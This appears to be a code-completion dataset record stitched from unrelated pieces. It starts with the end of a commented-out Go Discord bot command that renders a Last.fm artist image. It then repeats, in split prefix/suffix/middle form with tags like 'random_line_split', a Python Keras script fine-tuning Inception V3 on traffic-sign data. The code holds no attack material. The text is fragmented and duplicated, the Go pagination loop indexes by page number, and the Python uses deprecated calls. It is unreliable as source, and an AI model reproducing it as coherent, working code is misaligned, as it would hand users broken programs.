// c.displayArtistInfo(ctx, artist) // display info with current artist
// }
// }
// return c.CommandInterface
// }
// func (c Band) displayArtistInfo(ctx atlas.Context, artist lastfm.ArtistGetInfo) {
// albums := c.getAlbumsList(ctx, artist) // gets users albums from artist
// tracks, err := c.getTracksList(ctx, artist) // gets users tracks from artist
// if err != nil {
// ctx.Message.Reply(ctx.Atlas, err.Error())
// return
// }
// lfmuser, _ := database.GetLastfmUserInfo(ctx.Message.Author, c.Lastfm)
// aimg := lib.GetArtistImage(artist) // artist image is scraped from metal-archives
// avres, _ := grab.Get(lib.LocGet("temp/"), lib.GenAvatarURL(ctx.Message.Author))
// bg := lib.OpenImage(lib.LocGet("static/images/background.png"))
// av := lib.OpenImage(avres.Filename)
// os.Remove(avres.Filename)
// air := resize.Resize(230, 230, aimg, resize.Bicubic)
// avr := resize.Resize(72, 72, av, resize.Bicubic)
// dc := gg.NewContext(1000, 600)
// dc.DrawImage(bg, 0, 0)
// // artist image shadow
// dc.SetRGBA(1, 1, 1, 0.2)
// dc.DrawRectangle(0, 50, 1000, 72)
// dc.Fill()
// // artist image
// dc.SetRGBA(0, 0, 0, 0.3)
// dc.DrawRoundedRectangle(50, 50, 240, 240, 10)
// dc.Fill()
// dc.DrawImage(air, 55, 55)
// // artist name and play count
// dc.SetRGB(0.9, 0.9, 0.9)
// dc.LoadFontFace(FontBold, 20)
// dc.DrawStringWrapped(artist.Name, 50, 310, 0, 0, 230, 1.5, gg.AlignCenter)
// dc.LoadFontFace(FontRegular, 20)
// dc.DrawStringWrapped(fmt.Sprintf("%s plays", artist.Stats.UserPlays), 50, 345, 0, 0, 235, 1.5, gg.AlignCenter)
// // separator between artist name and tags
// dc.DrawLine(50, 370, 285, 370)
// dc.SetLineWidth(0.5)
// dc.Stroke()
// // Get the artist tags, and stringify them
// var tags []string
// for _, tag := range artist.Tags {
// tags = append(tags, tag.Name)
// }
// // tags
// dc.DrawStringWrapped(lib.JoinString(tags, ", "), 50, 380, 0, 0, 235, 1.5, gg.AlignCenter)
// // user avatar/info
// dc.DrawImage(avr, 315, 50)
// dc.LoadFontFace(FontBold, 26)
// dc.SetRGB(0.9, 0.9, 0.9)
// dc.DrawString(ctx.Message.Author.Username+" ("+lfmuser.Name+")", 400, 80)
// // scrobble count
// dc.LoadFontFace(FontRegular, 20)
// dc.SetRGB(0.9, 0.9, 0.9)
// printer := message.NewPrinter(language.English)
// pc, _ := strconv.Atoi(lfmuser.PlayCount)
// dc.DrawString(fmt.Sprintf("%s scrobbles", printer.Sprintf("%d", pc)), 400, 110)
// dc.DrawString("Albums", 490, 150)
// // takes all albums and aranges them in a 2x2 grid
// for i, album := range albums {
// if i < len(albums) && i < 4 {
// ares, _ := grab.Get(lib.LocGet("temp/"), album.Images[3].URL)
// ai := lib.OpenImage(ares.Filename)
// os.Remove(ares.Filename)
// ar := resize.Resize(145, 145, ai, resize.Bicubic)
// pos := albumPositions[i]
// // shadow
// dc.SetRGBA(0, 0, 0, 0.3)
// dc.DrawRoundedRectangle(pos.Shadow.X, pos.Shadow.Y, 155, 155, pos.Shadow.R)
// dc.Fill()
// // album image
// dc.DrawImage(ar, pos.X, pos.Y)
// // album name/play count
// dc.SetRGBA(1, 1, 1, 0.9)
// dc.LoadFontFace(FontRegular, 20)
// dc.DrawString(lib.ShortStr(album.Name, 15), pos.Info.X, pos.Info.Y)
// dc.LoadFontFace(FontRegular, 16)
// dc.DrawString(fmt.Sprintf("%s plays", album.PlayCount), pos.Info.Plays.X, pos.Info.Plays.Y)
// }
// }
// dc.LoadFontFace(FontRegular, 20)
// dc.DrawString("Tracks", 790, 150)
// // takes top tracks and lists the top 4
// for i, track := range tracks {
// if i < len(tracks) && i < 4 {
// pos := trackPositions[i]
// dc.SetRGB(0.9, 0.9, 0.9)
// dc.LoadFontFace(FontRegular, 16)
// dc.DrawString(lib.ShortStr(track.Name, 15), pos.X, pos.Y)
// dc.LoadFontFace(FontBold, 16)
// dc.DrawString(fmt.Sprintf("%s plays", track.PlayCount), pos.Plays.X, pos.Plays.Y)
// }
// }
// lib.BrandImage(dc) // brand image
// dc.SavePNG(lib.LocGet("temp/" + ctx.Message.Author.ID.String() + "_band.png"))
// r, _ := os.Open(lib.LocGet("temp/" + ctx.Message.Author.ID.String() + "_band.png"))
// ctx.Atlas.CreateMessage(ctx.Message.ChannelID, &disgord.CreateMessageParams{
// Files: []disgord.CreateMessageFileParams{
// {
// FileName: r.Name(),
// Reader: r,
// },
// },
// })
// r.Close()
// os.Remove(lib.LocGet("temp/" + ctx.Message.Author.ID.String() + "_band.png"))
// }
// // getArtistInfo retrieves artist info for a given user.
// func (c Band) getArtistInfo(artist string, user *disgord.User) (lastfm.ArtistGetInfo, error) {
// dbu := database.GetUser(user)
// return c.Lastfm.Artist.GetInfo(lastfm.P{"artist": artist, "username": dbu.Lastfm})
// }
// // getAlbumsList gets albums for a user for a given artist.
// func (c Band) getAlbumsList(ctx atlas.Context, artist lastfm.ArtistGetInfo) []fm.TopAlbum {
// user := database.GetUser(ctx.Message.Author)
// // kinda gotta get as many albums as possible. we'll use totalPages to make more queries if need be
// alist, _ := c.Lastfm.User.GetTopAlbums(lastfm.P{"user": user.Lastfm, "limit": "1000"}) // limit max = 1000 | // var albums = []fm.TopAlbum{}
// // add first batch of albums for artist into slice
// for _, album := range alist.Albums {
// if album.Artist.Name == artist.Name {
// albums = append(albums, album)
// }
// }
// // if more pages than 1, run another sweep
// if alist.TotalPages > 1 {
// for i := 1; i <= alist.TotalPages; i++ {
// al, _ := c.Lastfm.User.GetTopAlbums(lastfm.P{"user": user.Lastfm, "limit": "1000", "page": strconv.Itoa(i)})
// // add more albums for artist into slice
// if al.Albums[i].Artist.Name == artist.Name {
// albums = append(albums, al.Albums[i])
// }
// }
// }
// return albums
// }
// // getTracksList gets the users top tracks for a given artist.
// func (c Band) getTracksList(ctx atlas.Context, artist lastfm.ArtistGetInfo) ([]fm.TopTrack, error) {
// // this method works like getAlbumsList, won't comment
// user := database.GetUser(ctx.Message.Author)
// tlist, _ := c.Lastfm.User.GetTopTracks(lastfm.P{"user": user.Lastfm, "limit": "1000"})
// var tracks = []fm.TopTrack{}
// for _, track := range tlist.Tracks {
// if track.Artist.Name == artist.Name {
// tracks = append(tracks, track)
// }
// }
// if tlist.TotalPages > 1 {
// for i := 1; i <= tlist.TotalPages; i++ {
// tl, err := c.Lastfm.User.GetTopTracks(lastfm.P{"user": user.Lastfm, "limit": "1000", "page": strconv.Itoa(i)})
// if err != nil {
// return nil, errors.New("An error occurred while trying to retireve this info. Please try again later")
// }
// if tl.Tracks[i].Artist.Name == artist.Name {
// tracks = append(tracks, tl.Tracks[i])
// }
// }
// }
// return tracks, nil
// } | random_line_split |
|
fine_tune_Inception.py | # Taken from: https://github.com/flyyufelix/cnn_finetune/blob/master/vgg16.py
# based on: https://gist.github.com/baraldilorenzo/07d7802847aaad0a35d3
# -*- coding: utf-8 -*-
import keras
import itertools
import sys
from sklearn.metrics import confusion_matrix
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from keras.models import Sequential
from keras.optimizers import SGD
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras import backend as K
from keras.callbacks import LearningRateScheduler, ModelCheckpoint, EarlyStopping, CSVLogger
from keras.preprocessing.image import ImageDataGenerator
from skimage import io, color, exposure, transform
from sklearn.model_selection import train_test_split
from sklearn.cross_validation import train_test_split
from sklearn.metrics import log_loss
from new_load_GTSRB_Inception import load_GTSRB_data_1
class AccuracyHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.acc = []
def on_epoch_end(self, batch, logs={}):
self.acc.append(logs.get('acc'))
history = AccuracyHistory()
# Variables to run the script with a bat-script
dropout_rate= float(sys.argv[1])#0.5
lr= float(sys.argv[2] )#1e-3
batch_size= int(sys.argv[3])#10
weights_filename= 'vgg16_weights_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.h5'
matrix_filename= 'conf_matrix_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.png'
log_filename='log_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30'
result_file='result_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.txt'
def conv2d_bn(x, nb_filter, nb_row, nb_col,
border_mode='same', subsample=(1, 1),
name=None):
#Utility function to apply conv + BN for Inception V3.
if name is not None:
bn_name = name + '_bn'
conv_name = name + '_conv'
else:
bn_name = None
conv_name = None
bn_axis = 1
x = Convolution2D(nb_filter, nb_row, nb_col,
subsample=subsample,
activation='relu',
border_mode=border_mode,
name=conv_name)(x)
x = BatchNormalization(axis=bn_axis, name=bn_name)(x)
return x
def inception_v3_model(img_rows, img_cols, channel=1, num_classes=None):
channel_axis = 1
img_input = Input(shape=(channel, img_rows, img_cols))
x = conv2d_bn(img_input, 32, 3, 3, subsample=(2, 2), border_mode='valid')
x = conv2d_bn(x, 32, 3, 3, border_mode='valid')
x = conv2d_bn(x, 64, 3, 3)
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = conv2d_bn(x, 80, 1, 1, border_mode='valid')
x = conv2d_bn(x, 192, 3, 3, border_mode='valid')
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
# mixed 0, 1, 2: 35 x 35 x 256
for i in range(3):
branch1x1 = conv2d_bn(x, 64, 1, 1)
branch5x5 = conv2d_bn(x, 48, 1, 1)
branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 32, 1, 1)
x = merge([branch1x1, branch5x5, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(i))
# mixed 3: 17 x 17 x 768
branch3x3 = conv2d_bn(x, 384, 3, 3, subsample=(2, 2), border_mode='valid')
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed3')
# mixed 4: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 128, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 128, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 128, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed4')
# mixed 5, 6: 17 x 17 x 768
for i in range(2):
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 160, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 160, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(5 + i))
# mixed 7: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 192, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed7')
# mixed 8: 8 x 8 x 1280
branch3x3 = conv2d_bn(x, 192, 1, 1)
branch3x3 = conv2d_bn(branch3x3, 320, 3, 3,
subsample=(2, 2), border_mode='valid')
branch7x7x3 = conv2d_bn(x, 192, 1, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 1, 7)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 7, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = AveragePooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch7x7x3, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed8')
# mixed 9: 8 x 8 x 2048
for i in range(2):
branch1x1 = conv2d_bn(x, 320, 1, 1)
branch3x3 = conv2d_bn(x, 384, 1, 1)
branch3x3_1 = conv2d_bn(branch3x3, 384, 1, 3)
branch3x3_2 = conv2d_bn(branch3x3, 384, 3, 1)
branch3x3 = merge([branch3x3_1, branch3x3_2],
mode='concat', concat_axis=channel_axis,
name='mixed9_' + str(i))
branch3x3dbl = conv2d_bn(x, 448, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 384, 3, 3)
branch3x3dbl_1 = conv2d_bn(branch3x3dbl, 384, 1, 3)
branch3x3dbl_2 = conv2d_bn(branch3x3dbl, 384, 3, 1)
branch3x3dbl = merge([branch3x3dbl_1, branch3x3dbl_2],
mode='concat', concat_axis=channel_axis)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(9 + i))
# Fully Connected Softmax Layer
x_fc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_fc = Flatten(name='flatten')(x_fc)
x_fc = Dense(1000, activation='softmax', name='predictions')(x_fc)
# Create model
model = Model(img_input, x_fc)
# Load ImageNet pre-trained data
model.load_weights('imagenet_models/inception_v3_weights_th_dim_ordering_th_kernels.h5')
# Truncate and replace softmax layer for transfer learning
# Cannot use model.layers.pop() since model is not of Sequential() type
# The method below works since pre-trained weights are stored in layers but not in the model
x_newfc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_newfc = Flatten(name='flatten')(x_newfc)
x_newfc = Dense(num_classes, activation='softmax', name='predictions')(x_newfc)
# Create another model with our customized softmax
model = Model(img_input, x_newfc)
# Learning rate is changed to 0.001
sgd = SGD(lr, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
return model
| def lr_schedule(epoch): # function that takes an epoch index as input and returns a new learning rate as output
return lr*(0.1**int(epoch/10))
if __name__ == '__main__':
img_rows, img_cols = 299, 299 # Resolution of inputs
channel = 3
num_classes = 43
# batch_size = 10 # 20
nb_epoch = 30
# Load data. Please implement your own load_data() module for your own dataset
X_train, Y_train, X_valid, Y_valid, Y_test = load_GTSRB_data_1(img_rows, img_cols)
# Load our model
print("loading model")
model = inception_v3_model(img_rows, img_cols, channel, num_classes)
csv_logger=CSVLogger('training.log') # callback that streams epoch results to a csv file
print("start fine tuning")
# Start Fine-tuning
model.fit(X_train, Y_train,
batch_size=batch_size,
nb_epoch=nb_epoch,
shuffle=True,
verbose=1,
validation_split=0.2, # fraction of the data held-out for validation
callbacks=[LearningRateScheduler(lr_schedule), history,csv_logger,
ModelCheckpoint(weights_filename, monitor='val_acc', verbose=1, save_best_only=True, mode='max')]
)
# ModelCheckpoint('incep_weights.{epoch:02d}-{val_loss:.2f}.h5',
#EarlyStopping(monitor='val_loss', patience=2, verbose=0),
#Get history of accuracy and plot it
# print("hhistory acc: ",history.acc)
# print(" history acc type: ", type(history.acc))
#np.save('history_acc_inception', history.acc)
#plt.plot(range(1,nb_epoch+1), history.acc)
#plt.xlabel('Epochs')
#plt.ylabel('Accuracy')
#plt.title("Inception")
#plt.show()
y_pred= model.predict_classes(X_valid)
print("Predictions: ", y_pred)
model.metrics_names
y_eval=model.evaluate(X_valid,Y_valid)
print("Evaluation: ", y_eval)
f=open(result_file, 'w')
f.write('Y_pred: ' + str(y_pred) )
f.write('Y_eval: ' + str(y_eval))
f.close()
cm=confusion_matrix(Y_test, y_pred) # confusion matrix
print(cm)
plt.matshow(cm)
plt.title('Confusion matrix InceptionV3')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
#plt.show()
plt.savefig(matrix_filename)
plt.close()
print("Done!") | random_line_split |
|
fine_tune_Inception.py |
# Taken from: https://github.com/flyyufelix/cnn_finetune/blob/master/vgg16.py
# based on: https://gist.github.com/baraldilorenzo/07d7802847aaad0a35d3
# -*- coding: utf-8 -*-
import keras
import itertools
import sys
from sklearn.metrics import confusion_matrix
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from keras.models import Sequential
from keras.optimizers import SGD
from keras.layers import Input, Dense, Convolution2D, MaxPooling2D, AveragePooling2D, ZeroPadding2D, Dropout, Flatten, merge, Reshape, Activation
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras import backend as K
from keras.callbacks import LearningRateScheduler, ModelCheckpoint, EarlyStopping, CSVLogger
from keras.preprocessing.image import ImageDataGenerator
from skimage import io, color, exposure, transform
from sklearn.model_selection import train_test_split
from sklearn.cross_validation import train_test_split
from sklearn.metrics import log_loss
from new_load_GTSRB_Inception import load_GTSRB_data_1
class AccuracyHistory(keras.callbacks.Callback):
def on_train_begin(self, logs={}):
self.acc = []
def | (self, batch, logs={}):
self.acc.append(logs.get('acc'))
history = AccuracyHistory()
# Variables to run the script with a bat-script
dropout_rate= float(sys.argv[1])#0.5
lr= float(sys.argv[2] )#1e-3
batch_size= int(sys.argv[3])#10
weights_filename= 'vgg16_weights_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.h5'
matrix_filename= 'conf_matrix_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.png'
log_filename='log_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30'
result_file='result_frac_0_3_lr_' + str(lr) +'_batch'+str(batch_size)+'_drop_'+str(dropout_rate)+'_epochs_30.txt'
def conv2d_bn(x, nb_filter, nb_row, nb_col,
border_mode='same', subsample=(1, 1),
name=None):
#Utility function to apply conv + BN for Inception V3.
if name is not None:
bn_name = name + '_bn'
conv_name = name + '_conv'
else:
bn_name = None
conv_name = None
bn_axis = 1
x = Convolution2D(nb_filter, nb_row, nb_col,
subsample=subsample,
activation='relu',
border_mode=border_mode,
name=conv_name)(x)
x = BatchNormalization(axis=bn_axis, name=bn_name)(x)
return x
def inception_v3_model(img_rows, img_cols, channel=1, num_classes=None):
channel_axis = 1
img_input = Input(shape=(channel, img_rows, img_cols))
x = conv2d_bn(img_input, 32, 3, 3, subsample=(2, 2), border_mode='valid')
x = conv2d_bn(x, 32, 3, 3, border_mode='valid')
x = conv2d_bn(x, 64, 3, 3)
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = conv2d_bn(x, 80, 1, 1, border_mode='valid')
x = conv2d_bn(x, 192, 3, 3, border_mode='valid')
x = MaxPooling2D((3, 3), strides=(2, 2))(x)
# mixed 0, 1, 2: 35 x 35 x 256
for i in range(3):
branch1x1 = conv2d_bn(x, 64, 1, 1)
branch5x5 = conv2d_bn(x, 48, 1, 1)
branch5x5 = conv2d_bn(branch5x5, 64, 5, 5)
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 32, 1, 1)
x = merge([branch1x1, branch5x5, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(i))
# mixed 3: 17 x 17 x 768
branch3x3 = conv2d_bn(x, 384, 3, 3, subsample=(2, 2), border_mode='valid')
branch3x3dbl = conv2d_bn(x, 64, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3)
branch3x3dbl = conv2d_bn(branch3x3dbl, 96, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = MaxPooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed3')
# mixed 4: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 128, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 128, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 128, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed4')
# mixed 5, 6: 17 x 17 x 768
for i in range(2):
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 160, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 160, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(5 + i))
# mixed 7: 17 x 17 x 768
branch1x1 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(x, 192, 1, 1)
branch7x7 = conv2d_bn(branch7x7, 192, 1, 7)
branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)
branch7x7dbl = conv2d_bn(x, 160, 1, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)
branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)
branch_pool = AveragePooling2D((3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch7x7, branch7x7dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed7')
# mixed 8: 8 x 8 x 1280
branch3x3 = conv2d_bn(x, 192, 1, 1)
branch3x3 = conv2d_bn(branch3x3, 320, 3, 3,
subsample=(2, 2), border_mode='valid')
branch7x7x3 = conv2d_bn(x, 192, 1, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 1, 7)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 7, 1)
branch7x7x3 = conv2d_bn(branch7x7x3, 192, 3, 3,
subsample=(2, 2), border_mode='valid')
branch_pool = AveragePooling2D((3, 3), strides=(2, 2))(x)
x = merge([branch3x3, branch7x7x3, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed8')
# mixed 9: 8 x 8 x 2048
for i in range(2):
branch1x1 = conv2d_bn(x, 320, 1, 1)
branch3x3 = conv2d_bn(x, 384, 1, 1)
branch3x3_1 = conv2d_bn(branch3x3, 384, 1, 3)
branch3x3_2 = conv2d_bn(branch3x3, 384, 3, 1)
branch3x3 = merge([branch3x3_1, branch3x3_2],
mode='concat', concat_axis=channel_axis,
name='mixed9_' + str(i))
branch3x3dbl = conv2d_bn(x, 448, 1, 1)
branch3x3dbl = conv2d_bn(branch3x3dbl, 384, 3, 3)
branch3x3dbl_1 = conv2d_bn(branch3x3dbl, 384, 1, 3)
branch3x3dbl_2 = conv2d_bn(branch3x3dbl, 384, 3, 1)
branch3x3dbl = merge([branch3x3dbl_1, branch3x3dbl_2],
mode='concat', concat_axis=channel_axis)
branch_pool = AveragePooling2D(
(3, 3), strides=(1, 1), border_mode='same')(x)
branch_pool = conv2d_bn(branch_pool, 192, 1, 1)
x = merge([branch1x1, branch3x3, branch3x3dbl, branch_pool],
mode='concat', concat_axis=channel_axis,
name='mixed' + str(9 + i))
# Fully Connected Softmax Layer
x_fc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_fc = Flatten(name='flatten')(x_fc)
x_fc = Dense(1000, activation='softmax', name='predictions')(x_fc)
# Create model
model = Model(img_input, x_fc)
# Load ImageNet pre-trained data
model.load_weights('imagenet_models/inception_v3_weights_th_dim_ordering_th_kernels.h5')
# Truncate and replace softmax layer for transfer learning
# Cannot use model.layers.pop() since model is not of Sequential() type
# The method below works since pre-trained weights are stored in layers but not in the model
x_newfc = AveragePooling2D((8, 8), strides=(8, 8), name='avg_pool')(x)
x_newfc = Flatten(name='flatten')(x_newfc)
x_newfc = Dense(num_classes, activation='softmax', name='predictions')(x_newfc)
# Create another model with our customized softmax
model = Model(img_input, x_newfc)
# Learning rate is changed to 0.001
sgd = SGD(lr, decay=1e-6, momentum=0.9, nesterov=True)
model.compile(optimizer=sgd, loss='categorical_crossentropy', metrics=['accuracy'])
return model
def lr_schedule(epoch): # function that takes an epoch index as input and returns a new learning rate as output
return lr*(0.1**int(epoch/10))
if __name__ == '__main__':
img_rows, img_cols = 299, 299 # Resolution of inputs
channel = 3
num_classes = 43
# batch_size = 10 # 20
nb_epoch = 30
# Load data. Please implement your own load_data() module for your own dataset
X_train, Y_train, X_valid, Y_valid, Y_test = load_GTSRB_data_1(img_rows, img_cols)
# Load our model
print("loading model")
model = inception_v3_model(img_rows, img_cols, channel, num_classes)
csv_logger=CSVLogger('training.log') # callback that streams epoch results to a csv file
print("start fine tuning")
# Start Fine-tuning
model.fit(X_train, Y_train,
batch_size=batch_size,
nb_epoch=nb_epoch,
shuffle=True,
verbose=1,
validation_split=0.2, # fraction of the data held-out for validation
callbacks=[LearningRateScheduler(lr_schedule), history,csv_logger,
ModelCheckpoint(weights_filename, monitor='val_acc', verbose=1, save_best_only=True, mode='max')]
)
# ModelCheckpoint('incep_weights.{epoch:02d}-{val_loss:.2f}.h5',
#EarlyStopping(monitor='val_loss', patience=2, verbose=0),
#Get history of accuracy and plot it
# print("hhistory acc: ",history.acc)
# print(" history acc type: ", type(history.acc))
#np.save('history_acc_inception', history.acc)
#plt.plot(range(1,nb_epoch+1), history.acc)
#plt.xlabel('Epochs')
#plt.ylabel('Accuracy')
#plt.title("Inception")
#plt.show()
y_pred= model.predict_classes(X_valid)
print("Predictions: ", y_pred)
model.metrics_names
y_eval=model.evaluate(X_valid,Y_valid)
print("Evaluation: ", y_eval)
f=open(result_file, 'w')
f.write('Y_pred: ' + str(y_pred) )
f.write('Y_eval: ' + str(y_eval))
f.close()
cm=confusion_matrix(Y_test, y_pred) # confusion matrix
print(cm)
plt.matshow(cm)
plt.title('Confusion matrix InceptionV3')
plt.colorbar()
plt.ylabel('True label')
plt.xlabel('Predicted label')
#plt.show()
plt.savefig(matrix_filename)
plt.close()
print("Done!")
| on_epoch_end | identifier_name |
fine_tune_Inception.py |
# Taken from: https://github.com/flyyufelix/cnn_finetune/blob/master/vgg16.py
# based on: https://gist.github.com/baraldilorenzo/07d7802847aaad0a35d3
# -*- coding: utf-8 -*-
import keras
import itertools
import sys
from sklearn.metrics import confusion_matrix
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
